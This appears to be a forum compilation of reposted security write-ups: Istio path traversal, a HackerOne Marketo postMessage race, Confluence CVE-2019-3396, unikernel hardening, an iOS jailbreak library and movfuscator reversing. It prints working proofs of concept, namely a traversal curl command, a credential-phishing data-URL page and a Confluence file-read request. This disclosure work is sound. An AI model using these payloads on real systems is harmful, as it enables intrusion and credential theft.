Physical Security: The Missing Piece From Your Cyber Security Puzzle
Physical Security = Information Security, both have almost identical requirements
How to get started with physical security
How Physical security fails: 2 Tales from a Sneaker

Crime prevention through environmental design (CPTED)
Crime prevention through environmental design (CPTED) is a set of design principles used to discourage crime. The concept is simple: buildings and properties are designed to prevent damage from the force of the elements and natural disasters; they should also be designed to prevent crime.
[William Deutsch]
There are four major principles:
Natural Surveillance: criminals will do everything to stay undetected, so we need to keep them under observation by keeping many areas bright and by trying to eliminate hiding spots.
Natural Access Control: relies on doors, fences, shrubs, and other physical elements to keep unauthorized persons out of a particular place if they do not have a legitimate reason for being there.
Territorial Reinforcement: achieved by giving spatial definitions, such as the subdivision of space into different degrees of public/semi-public/private areas.
Maintenance: the property should be well-maintained.
You can find the full Crime Prevention Through Environmental Design guide in the references section below.

Summary
In this article we explored many aspects of physical security. We started by learning the relationship between physical security and information security. Later, we dived deep into many terminologies in physical security. Then, we discovered how to perform a physical penetration test and what team is required to do it successfully. Finally, we finished the article with a small glimpse of crime prevention through environmental design.
This article was originally posted on Peerlyst.

Sursa: http://brilliancesecuritymagazine.com/op-ed/how-to-perform-physical-penetration-testing/
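As a small addendum to the Risk = Threat x Vulnerability formula quoted earlier in this article, here is a toy sketch of how such a score could be computed; the 1-5 scales and the example scenario are invented for illustration only.

# toy illustration of Risk = Threat x Vulnerability (x Impact), on made-up 1-5 scales
def risk_score(threat, vulnerability, impact=1):
    return threat * vulnerability * impact

# e.g. an unlocked server room door with frequent tailgating attempts
print(risk_score(threat=4, vulnerability=5, impact=3))  # -> 60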
  11. Assessing Unikernel Security In this “modern” era of software development, the spotlight has bounced from virtual machines on clouds, to containers on clouds, to, currently, container orchestration… on clouds. As the “container wars” rage on, leaving behind multiple evolutionarily (or politically) dead-end implementations, unikernels are on the rise. Unikernels are applications built as specialized, minimal operating systems. While unikernels originated as an academic curiosity in the 90s, the modern crop are primarily focused on running as lightweight paravirtualized guests… on clouds. While some proponents of unikernels consider them to be the successor to containers, the two are, in fact, fairly different beasts with different tradeoffs. While containers make Unix/POSIX the base abstraction for applications, unikernels declare their own. Some unikernels focus on providing varying levels of POSIX compatibility, while others are based around specific programming languages, providing idiomatic APIs for applications written in those languages. However, the core concept of unikernels goes deeper: their main appeal is not the features that they provide, but rather, those that they don’t. Unikernels intentionally omit a great deal of the functionality typically found in full-featured operating systems, which their developers deemed to be not only unnecessary baggage, but also a potential security risk (as their presence substantially increases the system’s attack surface). Furthermore, those developers often attempt to simplify — and even completely reimplement — major OS components such as the network stack, throwing out what supporters call “cruft” and skeptics call “well-tested” or “mature” code. Advocates claim that unikernels are smaller, nimbler, and more secure by virtue of freeing themselves from the shackles of decades-old operating systems code. Such idealized claims are indeed appealing, but are they actually true? Our recently-posted whitepaper covers our initial foray into unikernels and focuses on the native aspects of application security as applied to them. Unikernel applications have a threat model unlike that of normal processes running on a standard operating system, Unix container or otherwise; in unikernels, general application code runs entirely within kernel space. We begin the whitepaper by describing the general threat model of unikernels as compared to that of containers. We then describe several relevant core security features and exploitation mitigations both within and provided by modern operating systems and build toolchains, and explore how these may apply to unikernels. This forms the basis of our methodology for assessing the general correctness and safety of unikernels. We go on to apply this testing methodology to two major open-source unikernel projects, Rumprun and IncludeOS. For each unikernel, we provide a suite of test cases to invoke and identify relevant security protections, and dig into their source and compiled code to uncover further issues. We also discuss unikernel-specific exploitation techniques and provide example exploit code for common memory corruption vulnerabilities. The presence of these vulnerability classes would enable reliable blind remote exploitation; that is, an attacker could gain arbitrary code execution in ring 0 without any direct knowledge of either the source code or the binary. 
Other notable vulnerabilities include a brute-force attack that takes advantage of unikernels' ability to restart almost instantly, and a stack overflow that is able to stomp over the very copy instruction that caused it due to unusual section ordering. We then document a number of remediation and hardening recommendations for each unikernel and document our disclosure interactions with each project. As part of the latter, we assess the upstream patches made in response to our findings and recommendations. We introduce a series of our own patches that remediate a number of the issues we identified in Rumprun, many of which apply more generally to the Xen Mini-OS kernel on which it is based. These can be found here [1], here [2], and here [3].
To conclude, we contrast the proclaimed security benefits of unikernels with our actual results. We also briefly describe our current and future research into the security pitfalls of another oft-touted "security feature" of unikernels: the complete reimplementation of mature, external-facing OS components such as the network stack. Even if this process does simplify and modernize the relevant code, as unikernel proponents claim, it also throws out decades of edge-case handling and security fixes that have accreted in response to security vulnerabilities. We are concerned that such re-implementation efforts do not show appropriate respect to the maturity of such codebases, and in doing so may reopen Pandora's box. As a side note, we will shortly announce several issues that we identified in the MirageOS unikernel but did not cover in our ToorCon XX talk due to disclosure timelines.
NCC Group regularly performs a large number of engagements assessing the security and hardening of applications and services, and the platforms they run on, in, and under, including containers, clouds, PaaSes, embedded runtimes, and specialized sandboxes, to name a few. The authors were drawn to this research by the potential and promise unikernel technology (still) has to build lightweight, performant, robust, and secure services in fundamentally new ways. If you're building any of the above, especially anything unikernel-based, we'd love to help.
[1] https://github.com/nccgroup/rumprun
[2] https://github.com/nccgroup/src-netbsd
[3] https://github.com/nccgroup/buildrump.sh
Published date: 02 April 2019
Written by: Jeff Dileo and Spencer Michaels

Sursa: https://www.nccgroup.trust/us/about-us/newsroom-and-events/blog/2019/april/assessing-unikernel-security/
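The "suite of test cases" the whitepaper mentions is not reproduced in this post, but the general shape of such a probe is easy to sketch. The following is a minimal example of my own (an assumption about the approach, not code from the whitepaper) that reveals whether stack-smashing protection is active in a given build: compile it into the target with and without -fstack-protector-strong and observe whether the overflow aborts cleanly.

/* minimal stack-canary probe sketch (not from the whitepaper) */
#include <stdio.h>
#include <string.h>

static void probe(const char *input) {
    char buf[16];
    strcpy(buf, input);            /* intentional overflow for the test */
    printf("copied: %s\n", buf);
}

int main(void) {
    char big[64];
    memset(big, 'A', sizeof(big) - 1);
    big[sizeof(big) - 1] = '\0';
    probe(big);                    /* with SSP enabled, this should abort at return */
    return 0;
}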
  12. CVE-2019-9901 - Istio/Envoy Path traversal
TLDR; I found a path traversal bug in Istio's authorization policy enforcement.

Discovery
About a year ago, as part of a customer project, I started looking at Istio, and I really liked what I saw. In fact, I liked it so much that I decided to submit a talk on it for JavaZone in 2018. My favorite thing about Istio was, and still is, the mutual TLS authentication and authorization with workload-bound certificates carrying SPIFFE identities. Istio has evolved a lot from the first version, 0.5.0, which I initially looked at, to the 1.1 release. The 0.5.0 authorization policies came in the form of deniers, which sounded a lot like blacklists. The later versions have moved to a positive security model (whitelist), where you can specify which workloads (and/or end users, based on JWT) should be allowed to access certain services. Further restrictions can be specified using a set of protocol-based authorization rules. I really like the coarse-grained workload authorization, but I'm not too fond of the protocol-based rules. We have seen different parsers interpreting the same thing in different ways way too many times. Some perfect examples of this are in Orange Tsai's brilliant research presented in "A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages!". I mentioned my concerns about this in some later versions of my Istio talk, but never actually tested it... until now...

The bug
I set up a simple project with a web server and deployed it on Kubernetes. The web application had two endpoints, /public/ and /secret/. I added an authorization policy which tried to grant access to anything below /public/:

rules:
- services: ["backend.fishy.svc.cluster.local"]
  methods: ["GET"]
  paths: ["/public/*"]

I then used standard path traversal from curl:

curl -vvvv --path-as-is "http://backend.fishy.svc.cluster.local:8081/public/../secret/"

And was able to reach /secret/.

Timeline
The Istio team was very friendly and responsive and kept me up to date on the progress.
2019-02-18: I sent the initial bug report to the istio-security-vulnerabilities mailbox
2019-02-18: Istio team acknowledges receiving the report
2019-02-20: Istio team reports the bug has been triaged and work started
2019-02-27: I ask some follow-up questions about the mail received on the 20th
2019-02-27: Istio team replies to the questions
2019-03-28: Istio team updates me about working with the Envoy team to fix this, with a plan to release on April 2nd. The Envoy issue was created on the 20th of February: https://github.com/envoyproxy/envoy/issues/6008
2019-04-01: Istio team sends a new update setting April 5th as the new target date
2019-04-05: The security fix is published in Istio versions 1.1.2/1.0.7 and Envoy version 1.9.1. The Envoy bug is assigned CVE-2019-9901

Sursa: https://github.com/eoftedal/writings/blob/master/published/CVE-2019-9901-path-traversal.md
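To make the root cause concrete: the authorization check effectively performs a prefix match on the raw request path, while the backend serves the normalized path. A small illustration of that mismatch (just the principle, not Istio/Envoy code):

import posixpath

raw = "/public/../secret/"
print(raw.startswith("/public/"))   # True  -> a naive prefix rule allows the request
print(posixpath.normpath(raw))      # "/secret" -> what the backend actually serves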
  13. Client-Side Race Condition using Marketo, allows sending user to data-protocol in Safari when form without onSuccess is submitted on www.hackerone.com

fransrosen submitted a report to HackerOne. Jul 14th (9 months ago)

Hi,
I gave a talk earlier this month about Client-Side Race Conditions for postMessage at AppSecEU: https://speakerdeck.com/fransrosen/owasp-appseceu-2018-attacking-modern-web-technologies
In this talk I mention some fun ways to race postMessages from a malicious origin before the legit source sends them.

Background
As you remember from #207042, you use Marketo for your form submissions on www.hackerone.com. Back then, I abused the fact that no origin was checked on the receiving end of marketo.com. By doing this I was then able to steal the data being submitted.

Technical Description
In this case however, I noticed that as soon as you submit a form, one of the listeners on www.hackerone.com will pass the content forward to a handler for the specific form that was loaded. As soon as it finds the form that was initiated and submitted, it will run either the error or the success function, based on the content of the postMessage. If the message is a success, it will run any form.onSuccess defined when the form was loaded. You can see some of these in this file: https://www.hackerone.com/sites/default/files/js/js_pdV-E7sfuhFWSyRH44H1WwxQ_J7NeE2bU6XNDJ8w1ak.js

form.onSuccess(function() {
    return false;
});

If the onSuccess returns false, nothing more will happen. However, if the onSuccess doesn't exist or returns true, the parameter called followUpUrl will instead be sent to location.href. There is no check whatsoever on what this URL contains. The code does parse the URL, and if a parameter called aliId is set, it will append it to the URL. As you may know, the flow of the Marketo solution looks like this:

1. Form is initiated by loading a JS-file from Marketo.
2. Form shows up on www.hackerone.com
3. Form is submitted. Listener is now initiated on www.hackerone.com
4. Message is sent to Marketo from www.hackerone.com using postMessage
5. Marketo gets the message and runs an ajax call to save it on Marketo
6. When successful, a postMessage is sent from Marketo back to www.hackerone.com with the status.
7. The listener catches the response and checks onSuccess. If onSuccess gives false, don't do anything. If it doesn't exist or returns true, follow the followUpUrl.

Exploitation
Since no origin check is made on the listener initiated in #3, we can from our end try to race the message between #3 and #6. If our message comes through, we can direct the user to whatever location we like, if we find a form that doesn't utilize onSuccess.

Forms on www.hackerone.com
Looking at the forms, we can see that one being initiated, called mktoForm_1013, does not have any onSuccess function on it. This means that we can now use the followUpUrl from the postMessage to send the user to our location. We can also see in your JS code above that the following URLs contain mktoForm_1013:

if (location.pathname == "/product/response") {
    $('#mktoForm_1013 .mktoHtmlText p').text('Want to get up and running with HackerOne Response? Give us a few details and we’ll be in touch shortly!');
} else if (location.pathname == "/product/bounty") {
    $('#mktoForm_1013 .mktoHtmlText p').text('Want to tap into the ultimate level of hacker-powered security with HackerOne Bounty?
Give us a few details and we’ll be in touch shortly!');
} else if (location.pathname == "/product/challenge") {
    $('#mktoForm_1013 .mktoHtmlText p').text('Up for a HackerOne Challenge? Want to learn more? Give us a few details and we’ll be in touch shortly!');
} else if (location.pathname == "/services") {
    $('#mktoForm_1013 .mktoHtmlText p').text("We're looking forward to serving you. Give us a few details and we’ll be in touch shortly!");
} else if (location.pathname == "/") {
    $('#mktoForm_1013 .mktoHtmlText p').text("Start uncovering critical vulnerabilities today. Give us a few details and we’ll be in touch shortly!");
}

And as before in the old report, we know that #contact as the fragment will open the form directly without interaction.

CSP
Due to your CSP, we cannot send the user to javascript:. If your CSP had allowed it, we would have a proper XSS on www.hackerone.com. Chrome and Firefox also disallow sending the user to a data:-URL. We can send the user to any location we like, but that's no fun.
...but...
...enter Safari. Safari does not restrict top navigation to data: (tested in macOS 10.13.5, Safari 11.1.1). This means that we can do the following:

1. Have a malicious page opening https://www.hackerone.com/product/response#contact
2. Make it send a bunch of messages saying the form was successfully submitted.
3. When the victim fills in the form and submits, our message will hopefully win, since Marketo needs to both get the postMessage and send an ajax call to save the response before it sends a legit response.
4. We redirect the user to a very good-looking sign-in page for HackerOne.
5. ??? PROFIT!!!

PoC
When trying this attack I noticed that if Safari opens www.hackerone.com in a new tab instead of a new window, Safari counts the tab as inactive and will slow down the sending of postMessages to the current frame. However, if you open www.hackerone.com in a completely new window, using window.open(url,'','_blank'), Safari will not count the old window as inactive and the messages will be sent just as fast, which will significantly increase our chance of winning the race.
The following HTML should show you my PoC in Safari: <html> <head> <script> var b; function doit() { setInterval(function() { b.postMessage('{"mktoResponse":{"for":"mktoFormMessage0","error":false,"data":{"formId":"1013","followUpUrl":"data:text/html;base64,PGhlYWQ+PGxpbmsgcmVsPXN0eWxlc2hlZXQgbWVkaWE9YWxsIGhyZWY9aHR0cHM6Ly9oYWNrZXJvbmUuY29tL2Fzc2V0cy9mcm9udGVuZC4wMjAwMjhlOTU1YTg5Zjg1YTVmYzUyMWVhYzMxMDM2OC5jc3MgLz48bGluayByZWw9c3R5bGVzaGVldCBtZWRpYT1hbGwgaHJlZj1odHRwczovL2hhY2tlcm9uZS5jb20vYXNzZXRzL3ZlbmRvci1iZmRlMjkzYTUwOTEzYTA5NWQ4Y2RlOTcwZWE1YzFlNGEzNTI0M2NjNzY3NWI2Mjg2YTJmM2Y3MDI2ZmY1ZTEwLmNzcz48L2hlYWQ+PGJvZHk+PGRpdiBjbGFzcz0iYWxlcnRzIj4KPC9kaXY+PGRpdiBjbGFzcz0ianMtYXBwbGljYXRpb24tcm9vdCBmdWxsLXNpemUiPjxzcGFuIGRhdGEtcmVhY3Ryb290PSIiPjxkaXYgY2xhc3M9ImZ1bGwtc2l6ZSBhcHBsaWNhdGlvbl9mdWxsX3dpZHRoX2xheW91dCI+PGRpdj48ZGl2PjxkaXYgY2xhc3M9InRvcGJhci1zaWduZWQtb3V0Ij48ZGl2IGNsYXNzPSJpbm5lci1jb250YWluZXIiPjxkaXY+PGEgY2xhc3M9ImFwcF9fbG9nbyIgaHJlZj0iLyI+PGltZyBzcmM9Imh0dHBzOi8vaGFja2Vyb25lLmNvbS9hc3NldHMvc3RhdGljL2ludmVydGVkX2xvZ28tYzA0MzBhZjgucG5nIiBhbHQ9IkhhY2tlck9uZSI+PC9hPjxkaXYgY2xhc3M9InRvcGJhci10b2dnbGUiPjxpIGNsYXNzPSJpY29uLWhhbWJ1cmdlciI+PC9pPjwvZGl2PjwvZGl2PjxkaXYgY2xhc3M9InRvcGJhci1zdWJuYXYtd3JhcHBlciI+PHVsIGNsYXNzPSJ0b3BiYXItc3VibmF2Ij48bGkgY2xhc3M9InRvcGJhci1zdWJuYXYtaXRlbSI+PGEgY2xhc3M9InRvcGJhci1zdWJuYXYtbGluayIgaHJlZj0iL3VzZXJzL3NpZ25faW4iPlNpZ24gSW48L2E+Jm5ic3A7fCZuYnNwOzwvbGk+PGxpIGNsYXNzPSJ0b3BiYXItc3VibmF2LWl0ZW0iPjxhIGNsYXNzPSJ0b3BiYXItc3VibmF2LWxpbmsiIGhyZWY9Ii91c2Vycy9zaWduX3VwIj5TaWduIFVwPC9hPjwvbGk+PC91bD48L2Rpdj48ZGl2IGNsYXNzPSJ0b3BiYXItbmF2aWdhdGlvbi13cmFwcGVyIj48dWwgY2xhc3M9InRvcGJhci1uYXZpZ2F0aW9uIj48bGkgY2xhc3M9InRvcGJhci1uYXZpZ2F0aW9uLWl0ZW0iPjxzcGFuIGNsYXNzPSJ0b3BiYXItbmF2aWdhdGlvbi1kZXNrdG9wLWxpbmsiPjxhIGNsYXNzPSJ0b3BiYXItbmF2aWdhdGlvbi1saW5rIj5Gb3IgQnVzaW5lc3M8L2E+PC9zcGFuPjwvbGk+PGxpIGNsYXNzPSJ0b3BiYXItbmF2aWdhdGlvbi1pdGVtIj48c3BhbiBjbGFzcz0idG9wYmFyLW5hdmlnYXRpb24tZGVza3RvcC1saW5rIj48YSBjbGFzcz0idG9wYmFyLW5hdmlnYXRpb24tbGluayI+Rm9yIEhhY2tlcnM8L2E+PC9zcGFuPjwvbGk+PGxpIGNsYXNzPSJ0b3BiYXItbmF2aWdhdGlvbi1pdGVtIj48c3BhbiBjbGFzcz0idG9wYmFyLW5hdmlnYXRpb24tZGVza3RvcC1saW5rIj48YSBjbGFzcz0idG9wYmFyLW5hdmlnYXRpb24tbGluayIgaHJlZj0iL2hhY2t0aXZpdHkiPkhhY2t0aXZpdHk8L2E+PC9zcGFuPjwvbGk+PGxpIGNsYXNzPSJ0b3BiYXItbmF2aWdhdGlvbi1pdGVtIj48c3BhbiBjbGFzcz0idG9wYmFyLW5hdmlnYXRpb24tZGVza3RvcC1saW5rIj48YSBjbGFzcz0idG9wYmFyLW5hdmlnYXRpb24tbGluayI+Q29tcGFueTwvYT48L3NwYW4+PC9saT48bGkgY2xhc3M9InRvcGJhci1uYXZpZ2F0aW9uLWl0ZW0iPjxzcGFuIGNsYXNzPSJ0b3BiYXItbmF2aWdhdGlvbi1kZXNrdG9wLWxpbmsiPjxhIGNsYXNzPSJ0b3BiYXItbmF2aWdhdGlvbi1saW5rIiBocmVmPSIvdXNlcnMvc2lnbl9pbiI+VHJ5IEhhY2tlck9uZTwvYT48L3NwYW4+PC9saT48L3VsPjwvZGl2PjwvZGl2PjwvZGl2PjxkaXYgY2xhc3M9InRvcGJhci1zdWIiPjwvZGl2PjwvZGl2PjxzcGFuPjwvc3Bhbj48L2Rpdj48ZGl2IGNsYXNzPSJmdWxsLXdpZHRoLWNvbnRhaW5lciIgc3R5bGU9InBhZGRpbmctdG9wOiAxNTBweDsiPjxkaXYgY2xhc3M9Im5hcnJvdy13cmFwcGVyIj48ZGl2Pjxmb3JtIG1ldGhvZD0icG9zdCIgYWN0aW9uPSJodHRwczovL2hhY2tlcm9uZS5jb20vdXNlcnMvc2lnbl9pbiIgb25zdWJtaXQ9ImFsZXJ0KCdpIGdvdCBpdDogJyArIGRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdzaWduX2luX2VtYWlsJykudmFsdWUgKyAnOicgKyBkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgnaW5wdXQtNCcpLnZhbHVlKTsgcmV0dXJuIGZhbHNlOyIgbm92YWxpZGF0ZT0iIiBjbGFzcz0ic3BlYy1zaWduLWluLWZvcm0iPjxkaXY+PGgxIGNsYXNzPSJzZWN0aW9uLXRpdGxlIHRleHQtYWxpZ25lZC1jZW50ZXIiPlNpZ24gaW4gdG8gSGFja2VyT25lPC9oMT48ZGl2IGNsYXNzPSJuYXJyb3ctY29udGFpbmVyIj48ZGl2IGNsYXNzPSJpbnB1dC13cmFwcGVyIj48bGFiZWwgY2xhc3M9ImlucHV0LWxhYmVsIiBmb3I9InNpZ25faW5fZW1haWwiPkVtYWlsIGFkZHJlc3M8L2xhYmVsPjxpbnB1dCB0eXBlPSJlbWFpbCIgY2xhc3M9ImlucHV0IHNwZWMtc2lnbi1pbi1lbWFpbCIgbmFtZT0idXNlcltlb
WFpbF0iIHZhbHVlPSIiIGlkPSJzaWduX2luX2VtYWlsIiBhdXRvY29tcGxldGU9Im9uIj48ZGl2IGNsYXNzPSJoZWxwZXItdGV4dCI+VXNpbmcgU0FNTD8gRW1haWwgYWRkcmVzcyBvbmx5LCBubyBwYXNzd29yZCBuZWVkZWQuPC9kaXY+PC9kaXY+PGRpdiBjbGFzcz0iaW5wdXQtd3JhcHBlciI+PGxhYmVsIGNsYXNzPSJpbnB1dC1sYWJlbCIgZm9yPSJpbnB1dC00Ij5QYXNzd29yZDwvbGFiZWw+PGlucHV0IHR5cGU9InBhc3N3b3JkIiBjbGFzcz0iaW5wdXQgc3BlYy1zaWduLWluLXBhc3N3b3JkIiBuYW1lPSJ1c2VyW3Bhc3N3b3JkXSIgdmFsdWU9IiIgaWQ9ImlucHV0LTQiIGF1dG9jb21wbGV0ZT0ib24iIG1heGxlbmd0aD0iNzIiPjwvZGl2PjxkaXYgY2xhc3M9ImlucHV0LXdyYXBwZXItc21hbGwiPjxkaXYgY2xhc3M9InJlbWVtYmVyLW1lIj48aW5wdXQgdHlwZT0iY2hlY2tib3giIGlkPSJ1c2VyX3JlbWVtYmVyX21lIiBuYW1lPSJ1c2VyW3JlbWVtYmVyX21lXSIgY2xhc3M9InNwZWMtc2lnbi1pbi1yZW1lbWJlci1tZSIgdmFsdWU9IjEiPjxsYWJlbCBmb3I9InVzZXJfcmVtZW1iZXJfbWUiPlJlbWVtYmVyIG1lIGZvciB0d28gd2Vla3M8L2xhYmVsPjwvZGl2PjxhIGhyZWY9Ii91c2Vycy9wYXNzd29yZC9uZXciIGNsYXNzPSJmb3Jnb3QtcGFzc3dvcmQiPkZvcmdvdCB5b3VyIHBhc3N3b3JkPzwvYT48ZGl2IGNsYXNzPSJjbGVhcmZpeCI+PC9kaXY+PC9kaXY+PGlucHV0IHR5cGU9InN1Ym1pdCIgY2xhc3M9ImJ1dHRvbiBidXR0b24tLXN1Y2Nlc3MgaXMtZnVsbC13aWR0aCBzcGVjLXNpZ24taW4tc3VibWl0IiBuYW1lPSJjb21taXQiIHZhbHVlPSJTaWduIGluIj48L2Rpdj48ZGl2IGNsYXNzPSJuYXJyb3ctZm9vdGVyIj5ObyBhY2NvdW50IHlldD8gPGEgaHJlZj0iL3VzZXJzL3NpZ25fdXAiPkNyZWF0ZSBhbiBhY2NvdW50LjwvYT48L2Rpdj48ZGl2IGNsYXNzPSJjbGVhcmZpeCI+PC9kaXY+PC9kaXY+PC9mb3JtPjwvZGl2PjwvZGl2PjwvZGl2PjwvZGl2Pjwvc3Bhbj48L2Rpdj48bm9zY3JpcHQ+PGRpdiBjbGFzcz0ianMtZGlzYWJsZWQiPkl0IGxvb2tzIGxpa2UgeW91ciBKYXZhU2NyaXB0IGlzIGRpc2FibGVkLiBUbyB1c2UgSGFja2VyT25lLCBlbmFibGUgSmF2YVNjcmlwdCBpbiB5b3VyIGJyb3dzZXIgYW5kIHJlZnJlc2ggdGhpcyBwYWdlLjwvZGl2Pjwvbm9zY3JpcHQ+PC9ib2R5Pg==","aliId":null}}}','*'); console.log('send...') }, 10); } </script> </head> <body> <a href="#" onclick="b=window.open('https://www.hackerone.com/product/response#contact','b','_blank'); doit(); return false;" target="_blank">Click me and send something</a></body> </html> It's large, but it also contains your login page. 1. User clicks on the malicious page: 2. User fills in the contact form and submits 3. User gets directly redirected to our data-page 4. If they sign in we will steal the creds: PoC-movie Here's a movie showing the scenario: Impact I'm pretty divided on the impact of this. You could argue that this is similar to opening www.hackerone.com from a page, that will on a later time redirect the user to data:, which is fully possible and probably just as sneaky. The only difference would be that this could be properly fixed and the logic of the listener in this case actually enables the attacker to fool the user related to the interaction with the site. Also, most likely a lot of other customers of Marketo are affected by this and if they lack CSP, there will be XSS:es all over the place. Also, if IE11 would support those contact-popups, it would be an XSS due to the lack of CSP-support, however now I'm getting a JS-error trying to open the contact-form... Mitigation What's interesting here though is that you can actually mitigate this easily by making sure you always use onSuccess=function(){return false} to always make sure followUpUrl won't be used. Regards, Frans 5 attachments: F320358: malicious.png F320359: contact.png F320360: sign-in.png F320361: popup.png F320362: safari-location-data.mp4 Sursa: https://hackerone.com/reports/381356
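To make the mitigation from the report concrete, here is a hedged sketch using the standard Marketo Forms 2.0 embed API; the subdomain, Munchkin ID, and the way the thank-you state is handled are placeholders, not taken from the report.

// mitigation sketch: never let Marketo's followUpUrl drive navigation
// (placeholder subdomain/Munchkin ID; form 1013 is the one named in the report)
MktoForms2.loadForm("//app-XXXX.marketo.com", "XXX-XXX-XXX", 1013, function (form) {
  form.onSuccess(function (values, followUpUrl) {
    // ignore the attacker-influenceable followUpUrl entirely;
    // render our own confirmation instead
    form.getFormElem().hide();
    return false; // returning false stops the redirect
  });
});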
  14. 【CVE-2019-3396】: SSTI and RCE in Confluence Server via Widget Connector
Posted on 2019-04-06 | Category: Web Security
Twitter: chybeta

Security Advisory
https://confluence.atlassian.com/doc/confluence-security-advisory-2019-03-20-966660264.html

Analysis
According to the documentation, there are three parameters you can set to control the content or format of the macro output: URL, Width and Height. The Widget Connector defines several renderers, for example FriendFeedRenderer:

public class FriendFeedRenderer implements WidgetRenderer {
    ...
    public String getEmbeddedHtml(String url, Map<String, String> params) {
        params.put("_template", "com/atlassian/confluence/extra/widgetconnector/templates/simplejscript.vm");
        return this.velocityRenderService.render(getEmbedUrl(url), params);
    }
}

In FriendFeedRenderer's getEmbeddedHtml function, you can see that it puts an extra option, _template, into the params map. However, some other renderers, such as those in the video category, just call render(getEmbedUrl(url), params) directly. So in this situation, we can "offer" the _template ourselves, and the backend will render using our parameters.

Reproduce

POST /rest/tinymce/1/macro/preview HTTP/1.1

{"contentId":"65601","macro":{"name":"widget","params":{"url":"https://www.viddler.com/v/test","width":"1000","height":"1000","_template":"../web.xml"},"body":""}}

Patch
In the fixed version, doSanitizeParameters is called before the HTML is rendered, which removes _template from the parameters. The code looks like this:

public class WidgetMacro extends BaseMacro implements Macro, EditorImagePlaceholder {
    public WidgetMacro(RenderManager renderManager, LocaleManager localeManager, I18NBeanFactory i18NBeanFactory) {
        ...
        this.sanitizeFields = Collections.unmodifiableList(Arrays.asList(new String[] { "_template" }));
    }
    ...
    public String execute(Map<String, String> parameters, String body, ConversionContext conversionContext) {
        ...
        doSanitizeParameters(parameters);
        return this.renderManager.getEmbeddedHtml(url, parameters);
    }

    private void doSanitizeParameters(Map<String, String> parameters) {
        Objects.requireNonNull(parameters);
        for (String sanitizedParameter : this.sanitizeFields) {
            parameters.remove(sanitizedParameter);
        }
    }
}

Sursa: https://chybeta.github.io/2019/04/06/Analysis-for-【CVE-2019-3396】-SSTI-and-RCE-in-Confluence-Server-via-Widget-Connector/
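For reference, the request above can be reproduced from the command line; the host is a placeholder, the contentId depends on the target instance, and on vulnerable versions the response leaks the rendered ../web.xml.

# hedged reproduction sketch of the PoC request from the post
curl -sk 'https://confluence.example.com/rest/tinymce/1/macro/preview' \
  -H 'Content-Type: application/json' \
  -d '{"contentId":"65601","macro":{"name":"widget","params":{"url":"https://www.viddler.com/v/test","width":"1000","height":"1000","_template":"../web.xml"},"body":""}}'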
  15. jelbrekLib
Give me tfp0, I give you jelbrek.
Library with commonly used patches in open-source jailbreaks. Call this a (light?) QiLin open-source alternative.

Compiling:
./make.sh

Setup
Compile, OR head over to https://github.com/jakeajames/jelbrekLib/tree/master/downloads and get everything there.
Link with jelbrekLib.a & IOKit.tbd and include jelbrekLib.h.
Call init_jelbrek() with tfp0 as your first thing and term_jelbrek() as your last.

Issues
AMFID patch won't persist after the app enters the background. A fix would be using a daemon (like amfidebilitate) or injecting a dylib (iOS 11).

iOS 12 status
rootFS remount is broken. There is hardening on snapshot_rename() which can be, and has been (privately), bypassed, but it for sure isn't as bad as last year with iOS 11.3.1, where they made major changes. The only thing we need is to figure out how they check that the snapshot is the rootfs and not something in /var, for example, where snapshot_rename works fine.
kexecute() is also probably broken on A12. Use bazad's PAC bypass, which offers the same thing, so this isn't an issue (for now).
Getting root, unsandboxing, NVRAM lock/unlock, setHSP4(), trustbin(), and entitlePid + task_for_pid() are all working fine. The rest, which is not on top of my mind, should also work fine.

Codesign bypass
Patching amfid should be a matter of getting task_for_pid() working. (Note: on A12 you need to take a completely different approach; bazad has proposed an amfid-patch-less amfid bypass here: https://github.com/bazad/blanket/tree/master/amfidupe, which will probably work, but don't take my word for it.) As for the payload dylib, you can just sign it with a legit cert and nobody will complain about the signature. As for unsigned binaries, you'll probably have to sign them with a legit cert as well, due to CoreTrust, or just add them to the trustcache.

Credits
theninjaprawn & xerub for patchfinding
xerub & the Electra team for trustcache injection
stek29 for nvramunlock & lock and the hsp4 patch
theninjaprawn & Ian Beer for dylib injection
Luca Todesco for the remount patch technique
Umang Raghuvanshi for the original remount idea
pwn20wnd for the implementation of the rename-APFS-snapshot technique
AMFID dylib-less patch technique by Ian Beer, reworked with the patch code from Electra's amfid_payload (stek29 & coolstar)
rootless-hsp4 idea by Ian Beer, implemented on his updated async_wake exploit
Sandbox exceptions by stek29 (https://stek29.rocks/2018/01/26/sandbox.html)
CSBlob patching with stuff from Jonathan Levin and xerub
Symbol finding by me (https://github.com/jakeajames/kernelSymbolFinder)
The rest of the patches are fairly simple and shouldn't be considered property of anyone, in my opinion. Everyone with enough knowledge can write them fairly easily.
And don't forget to tell me if I forgot to credit anyone!

Sursa: https://github.com/jakeajames/jelbrekLib
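Based on the setup notes above, a minimal usage sketch could look like the following. How you obtain tfp0 is exploit-specific, and the helper names between init and term (rootify/unsandbox here) are assumptions matching the README's "getting root, unsandboxing" description; check jelbrekLib.h for the exact functions and signatures.

/* minimal usage sketch; tfp0 acquisition is exploit-specific and omitted */
#include <mach/mach.h>
#include <unistd.h>
#include "jelbrekLib.h"

void post_exploit(mach_port_t tfp0) {
    init_jelbrek(tfp0);    // README: call this first, with tfp0

    // assumed helper names -- verify against jelbrekLib.h
    rootify(getpid());     // get root
    unsandbox(getpid());   // escape the sandbox

    term_jelbrek();        // README: call this last
}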
  16. Understanding the Movfuscator
14 MAR 2019 • 12 mins read

MoVfuscator is the PoC for the Turing completeness of the mov instruction. Yes, you guessed it right: it uses only movs, except in a few places. This makes reversing difficult, because the control flow is obfuscated. I'll be analyzing the challenge "Mov" of UTCTF'19 using IDA Free.

MoV

The Stack
Movfuscator uses its own stack. The stack consists of an array of addresses. Each element of the stack is at an offset of 0x200064 from its stack address. The stack begins at 0x83f70e8 and grows from high to low addresses. The stack pointer is saved in the variable sesp. The variable NEW_STACK stores the address of guard.

mov esp, NEW_STACK          ; address of guard
mov esp, [esp-0x200068]     ; address of A[n-1]
mov esp, [esp-0x200068]     ; address of A[n-2]
; ...
; n times
; ...
; use esp

So, mov esp, [esp-0x200068] subtracts 4 from esp. Now we can understand what start does.

mov dword [esp-4*4], SIGSEGV
mov dword [esp-4*4+4], offset sa_dispatch
mov dword [esp-4*4+8], 0
call sigaction
mov dword [esp-3*4], SIGILL
mov dword [esp-3*4+4], offset sa_loop
mov dword [esp-3*4+8], 0
call sigaction
;
; ...
;
